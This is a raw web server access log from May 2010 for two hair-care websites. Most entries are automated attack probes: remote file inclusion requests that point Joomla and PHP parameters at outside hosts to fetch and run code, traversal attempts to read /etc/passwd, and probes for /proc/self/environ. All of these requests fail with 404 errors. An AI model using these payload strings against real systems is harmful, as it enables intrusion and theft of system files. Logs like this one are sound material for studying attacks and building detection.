123.30.181.5 - - [02/May/2010:23:42:58 -0700] "GET /logs/access_100426.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:23:43:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13757 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:23:44:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15132 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
211.232.85.247 - - [02/May/2010:23:44:45 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:44:45 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:44:48 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:45:14 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.17 - - [02/May/2010:23:45:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13319 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
123.30.181.5 - - [02/May/2010:23:45:30 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:45:31 -0700] "GET /main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:45:31 -0700] "GET /logs//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:45:31 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:45:49 -0700] "GET /logs//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:45:49 -0700] "GET /main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:45:49 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.66 - - [02/May/2010:23:46:44 -0700] "GET /logs/access_100208.log//bbs/delete_all.php?board_skin_path=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.115.213.66 - - [02/May/2010:23:46:44 -0700] "GET /logs//bbs/delete_all.php?board_skin_path=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.115.213.66 - - [02/May/2010:23:46:44 -0700] "GET /bbs/delete_all.php?board_skin_path=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:47:39 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:47:39 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:47:39 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [02/May/2010:23:48:00 -0700] "GET /main.php?sayfa=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [02/May/2010:23:48:00 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [02/May/2010:23:48:00 -0700] "GET /logs//main.php?sayfa=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.175.223.80 - - [02/May/2010:23:48:13 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
69.175.26.98 - - [02/May/2010:23:48:28 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
83.103.70.86 - - [02/May/2010:23:48:34 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:48:46 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:48:46 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:48:46 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.160.224.208 - - [02/May/2010:23:49:00 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:49:28 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:49:34 -0700] "GET /logs/access_100426.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:50:15 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:50:15 -0700] "GET /include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:50:15 -0700] "GET /include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:50:15 -0700] "GET /logs//include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:50:16 -0700] "GET /logs/access_100426.log%20%20//include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:50:16 -0700] "GET /logs//include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:50:16 -0700] "GET /logs/access_100426.log%20%20//include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:50:41 -0700] "GET /logs/access_100426.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:51:19 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:52:09 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:52:09 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:52:09 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.103.70.86 - - [02/May/2010:23:52:17 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
83.103.70.86 - - [02/May/2010:23:52:17 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "growlonghairfast.com"
83.103.70.86 - - [02/May/2010:23:52:18 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
210.127.253.75 - - [02/May/2010:23:52:21 -0700] "GET /logs/access_100208.log//bbs/delete_all.php?board_skin_path=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
210.127.253.75 - - [02/May/2010:23:52:21 -0700] "GET /bbs/delete_all.php?board_skin_path=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
210.127.253.75 - - [02/May/2010:23:52:21 -0700] "GET /logs//bbs/delete_all.php?board_skin_path=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
69.175.26.98 - - [02/May/2010:23:52:24 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
69.175.26.98 - - [02/May/2010:23:52:24 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
69.175.26.98 - - [02/May/2010:23:52:24 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:53:06 -0700] "GET /logs/access_100125.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:53:37 -0700] "GET /logs/access_100125.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.103.70.86 - - [02/May/2010:23:53:42 -0700] "GET /logs/access_100215.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
69.175.26.98 - - [02/May/2010:23:53:49 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2" "growlonghairfast.com"
69.175.26.98 - - [02/May/2010:23:53:49 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
69.175.26.98 - - [02/May/2010:23:53:49 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
213.175.223.80 - - [02/May/2010:23:54:02 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
213.175.223.80 - - [02/May/2010:23:54:02 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
213.175.223.80 - - [02/May/2010:23:54:02 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
69.175.26.98 - - [02/May/2010:23:54:11 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
69.175.26.98 - - [02/May/2010:23:55:12 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
83.103.70.86 - - [02/May/2010:23:55:41 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
83.103.70.86 - - [02/May/2010:23:55:41 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "growlonghairfast.com"
83.103.70.86 - - [02/May/2010:23:55:41 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:55:51 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:55:51 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:55:51 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.175.223.80 - - [02/May/2010:23:56:59 -0700] "GET /logs/access_100215.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:57:15 -0700] "GET /logs/access_100426.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.160.224.208 - - [02/May/2010:23:57:21 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "growlonghairfast.com"
195.160.224.208 - - [02/May/2010:23:57:21 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
195.160.224.208 - - [02/May/2010:23:57:22 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "growlonghairfast.com"
83.103.70.86 - - [02/May/2010:23:57:49 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
213.175.223.80 - - [02/May/2010:23:57:59 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
213.175.223.80 - - [02/May/2010:23:57:59 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
213.175.223.80 - - [02/May/2010:23:57:59 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "growlonghairfast.com"
195.160.224.208 - - [02/May/2010:23:58:54 -0700] "GET /logs/access_100215.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:23:59:34 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:23:59:37 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [02/May/2010:23:59:38 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:23:59:41 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:23:59:56 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [03/May/2010:00:00:01 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
213.175.223.80 - - [03/May/2010:00:00:28 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
195.160.224.208 - - [03/May/2010:00:01:16 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
195.160.224.208 - - [03/May/2010:00:01:16 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
195.160.224.208 - - [03/May/2010:00:01:16 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:01:29 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:01:29 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:01:29 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:01:31 -0700] "GET /logs/access_100426.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:01:40 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:01:54 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:01:54 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:01:54 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.19 - - [03/May/2010:00:02:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16913 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
195.160.224.208 - - [03/May/2010:00:02:15 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:04:02 -0700] "GET /logs/access_100125.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:06:33 -0700] "GET /logs/access_100125.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:06:35 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:06:38 -0700] "GET /logs/access_100426.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:06:41 -0700] "GET /logs/access_100426.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.218.116.134 - - [03/May/2010:00:09:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
123.30.181.5 - - [03/May/2010:00:10:07 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [03/May/2010:00:10:20 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.233.57.242 - - [03/May/2010:00:10:53 -0700] "GET /logs/access.log/index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [03/May/2010:00:10:53 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [03/May/2010:00:10:53 -0700] "GET /logs/index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [03/May/2010:00:11:23 -0700] "GET /logs/access.log/index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [03/May/2010:00:11:23 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
